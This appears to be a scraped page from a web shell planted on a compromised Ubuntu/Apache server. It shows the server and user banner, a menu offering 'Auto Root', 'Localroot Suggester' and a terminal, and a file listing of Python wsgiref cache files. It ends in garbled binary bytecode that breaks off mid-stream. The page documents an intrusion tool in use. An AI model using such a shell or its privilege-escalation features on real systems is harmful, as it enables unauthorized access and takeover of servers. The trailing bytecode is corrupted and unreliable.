Linux tsuru-no-tsurugi 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.0.18 & Your IP : 216.73.216.68
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3.10 /
wsgiref /
__pycache__ /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.cpython-310.pyc
727
B
-rw-r--r--
2026-07-07 06:44
handlers.cpython-310.pyc
16.01
KB
-rw-r--r--
2026-07-07 06:44
headers.cpython-310.pyc
7.85
KB
-rw-r--r--
2026-07-07 06:44
simple_server.cpython-310.pyc
5.18
KB
-rw-r--r--
2026-07-07 06:44
util.cpython-310.pyc
5.28
KB
-rw-r--r--
2026-07-07 06:44
validate.cpython-310.pyc
14.25
KB
-rw-r--r--
2026-07-07 06:44
Save
Rename
o �9j3 � @ s4 d Z ddlmZmZ ddlZddlZddlmZ ddl m Z dZg d�Zde Z e � d ej�� d Ze d e ZG dd� de�ZG d d� de�ZG dd� de�Zdd� Zeefdd�Zedkr�edde��'Zej�� Zeded ded d� ddlZe�d� e�� W d � dS 1 s�w Y dS dS )a! BaseHTTPServer that implements the Python WSGI protocol (PEP 3333) This is both an example of how WSGI can be implemented, and a basis for running simple web applications on a local machine, such as might be done when testing or debugging an application. It has not been reviewed for security issues, however, and we strongly recommend that you use a "real" web server for production use. For example usage, see the 'if __name__=="__main__"' block at the end of the module. See also the BaseHTTPServer module docs for other API information. � )�BaseHTTPRequestHandler� HTTPServerN)� SimpleHandler)�python_implementationz0.2)� WSGIServer�WSGIRequestHandler�demo_app�make_server�WSGIServer/�/� c @ s e Zd ZeZdd� ZdS )� ServerHandlerc C s<